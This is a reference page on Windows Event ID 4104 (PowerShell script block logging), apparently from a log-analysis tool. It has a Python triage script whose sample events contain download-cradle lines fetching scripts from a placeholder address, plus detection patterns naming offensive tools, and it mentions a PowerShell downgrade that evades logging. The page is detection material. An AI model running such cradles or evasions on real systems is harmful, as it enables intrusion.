EventPeeker
Event ID 4104 · Level: Warning for blocks the engine flags as suspicious, Verbose otherwise · Channel: Microsoft-Windows-PowerShell/Operational · T1059.001

Windows Event ID 4104: PowerShell Script Block Logging

Logged when the PowerShell engine compiles and runs a script block. The record holds the code that is actually executed, so a payload that decodes itself at runtime and hands the result to Invoke-Expression is logged a second time in its de-obfuscated form. Benign blocks are written at Verbose level; blocks that match the engine's built-in list of suspicious terms are raised to Warning and are written even when Script Block Logging has not been turned on. One of the most valuable PowerShell forensic data sources.

MITRE ATT&CK

Technique

T1059.001 · PowerShell

Tactic

Execution

View on attack.mitre.org →

Why It Matters

Attackers heavily obfuscate PowerShell to evade detection. Script Block Logging records the code the engine executes, so when an encoded or obfuscated wrapper decodes its payload and runs it, the decoded payload appears in its own 4104 event, exposing encoded commands, in-memory tooling and download cradles. Two caveats: the legacy PowerShell 2.0 engine does not implement script block logging, so a downgrade (powershell.exe -Version 2 on hosts where the v2 engine is still installed) produces no 4104 events; and code that never passes through the PowerShell engine, such as a .NET assembly loaded directly, is not captured. Pair 4104 with Event ID 400 in the Windows PowerShell log, whose EngineVersion field reveals a downgrade.

Key Fields

Script Block Text (ScriptBlockText): the PowerShell code itself. Look for IEX (Invoke-Expression), DownloadString, [Convert]::FromBase64String and known offensive tool signatures.
Script Block ID (ScriptBlockId): GUID identifying the block. A block too large for one event is split across several 4104 events that share this ID; MessageNumber and MessageTotal give each fragment's position, so reassemble the fragments before searching them.
Path: file path when the block came from a script file; empty for code typed interactively or run from memory only, for example via -Command or -EncodedCommand.

Investigation Tips

  1. Search Script Block Text for IEX, Invoke-Expression and [System.Convert]::FromBase64String, the usual ingredients of encoded and obfuscated payloads; after a hit on FromBase64String, look for the later 4104 event that holds the decoded block.
  2. Look for download cradles: (New-Object Net.WebClient).DownloadString, Invoke-WebRequest and Invoke-RestMethod, and check Event ID 4688 for the parent process that launched PowerShell.
  3. Enable via GPO: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on PowerShell Script Block Logging. The policy sets EnableScriptBlockLogging to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, which is the value to check when an endpoint is not producing 4104 events.
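The tips above are the pieces of a small triage pipeline: pull the fields out of each 4104 record, reassemble fragments that share a ScriptBlockId in MessageNumber order, then search the whole block (and any base64 literal it decodes) for the indicators listed. The Python below is an added example written for this page, not EventPeeker code; the event XML, the ScriptBlockId values, the script path and the 192.0.2.10 address are constructed sample data, and the indicator labels are this example's own.

```python
"""Triage Event ID 4104 records: reassemble multi-part script blocks, then hunt for
obfuscation and download-cradle indicators (added example, not EventPeeker code)."""
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

NS = "http://schemas.microsoft.com/win/2004/08/events/event"  # Windows Event XML namespace

# Indicator patterns taken from the investigation tips; the names are labels of this example.
INDICATORS = {
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "download-cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "offensive-tool": re.compile(r"Invoke-Mimikatz|Invoke-Kerberoast|PowerView", re.I),
}
# A base64 literal passed straight into FromBase64String('...') or FromBase64String("...").
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def make_4104(block_id, text, num, total, path=""):
    """Build a constructed 4104 record in Windows Event XML shape (sample data, not a capture)."""
    return (
        f'<Event xmlns="{NS}"><System><EventID>4104</EventID></System><EventData>'
        f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{block_id}</Data><Data Name="Path">{escape(path)}</Data>'
        "</EventData></Event>"
    )


def parse_4104(xml_text):
    """Pull the 4104 EventData fields out of one event's XML."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.iter(f"{{{NS}}}Data")}
    return {"id": fields.get("ScriptBlockId", ""), "num": int(fields.get("MessageNumber", 1)),
            "total": int(fields.get("MessageTotal", 1)), "text": fields.get("ScriptBlockText", ""),
            "path": fields.get("Path", "")}


def reassemble(records):
    """Join the fragments of each ScriptBlockId in MessageNumber order. Large blocks are split
    across several 4104 events; searching one fragment at a time misses indicators that
    straddle the split. 'complete' is False when fragments are missing."""
    parts, meta = defaultdict(dict), {}
    for r in records:
        parts[r["id"]][r["num"]] = r["text"]
        meta[r["id"]] = (r["total"], r["path"])
    blocks = {}
    for bid, chunks in parts.items():
        total, path = meta[bid]
        blocks[bid] = {"text": "".join(chunks[n] for n in sorted(chunks)),
                       "path": path, "complete": len(chunks) == total}
    return blocks


def decode_embedded_base64(text):
    """Decode base64 literals found inside FromBase64String(...) calls. PowerShell also logs
    the decoded code as its own 4104 once IEX runs it; decoding here shows the payload even
    when that second event is absent (for example, logging was enabled after the fact)."""
    out = []
    for lit in B64_LITERAL.findall(text):
        raw = base64.b64decode(lit)
        # ASCII text encoded as UTF-16LE (what -EncodedCommand and most cradles use) has a
        # zero byte in every second position; anything else is treated as UTF-8.
        enc = "utf-16-le" if len(raw) >= 2 and raw[1] == 0 else "utf-8"
        out.append(raw.decode(enc, errors="replace"))
    return out


def scan_block(text):
    """Return (sorted indicator names, decoded payloads) for one reassembled block."""
    decoded = decode_embedded_base64(text)
    hits = set()
    for candidate in [text, *decoded]:
        hits.update(name for name, rx in INDICATORS.items() if rx.search(candidate))
    return sorted(hits), decoded


def triage(xml_records):
    """Full pipeline over raw 4104 XML strings; returns only the blocks that carry indicators."""
    blocks = reassemble(parse_4104(x) for x in xml_records)
    findings = []
    for bid, b in blocks.items():
        hits, decoded = scan_block(b["text"])
        if hits:
            findings.append({"id": bid, "path": b["path"] or "<memory-only>",
                             "complete": b["complete"], "indicators": hits, "decoded": decoded})
    return sorted(findings, key=lambda x: x["id"])


# Constructed sample records: the IDs, the script path and 192.0.2.10 are made up for this example.
BLOCK_BENIGN = "1f7a0000-0000-4000-8000-000000000001"
BLOCK_CRADLE = "1f7a0000-0000-4000-8000-000000000002"
BLOCK_ENCODED = "1f7a0000-0000-4000-8000-000000000003"
PAYLOAD = "Invoke-WebRequest -Uri http://192.0.2.10/p.ps1 -OutFile $env:TEMP\\p.ps1"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    make_4104(BLOCK_BENIGN, "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
              1, 1, "C:\\Scripts\\cleanup.ps1"),
    # Two-part block; part 2 is listed first to show that ordering uses MessageNumber.
    make_4104(BLOCK_CRADLE, "IEX $c.DownloadString('http://192.0.2.10/a.ps1')", 2, 2),
    make_4104(BLOCK_CRADLE, "$c = New-Object Net.WebClient; ", 1, 2),
    make_4104(BLOCK_ENCODED,
              f"IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{ENCODED}')))",
              1, 1),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["id"], f["path"], f["complete"], f["indicators"], f["decoded"])
```

Run as a script it prints the two flagged blocks and their decoded payloads; the benign cleanup script is not reported. For live data, the same Event XML shape comes from Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | ForEach-Object { $_.ToXml() }, so those strings can be passed to triage() unchanged.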

Related Event IDs

4103: PowerShell module logging. Records each command invocation and its bound parameter values; less detail about the code itself than 4104, but complementary.
4688: Process creation for the PowerShell process, giving the command line and the parent that launched it.

See Event ID 4104 in your logs

Upload a Windows Event Log (.evtx) file. EventPeeker automatically detects PowerShell Script Block Logging patterns, maps findings to MITRE ATT&CK, and generates an AI triage report.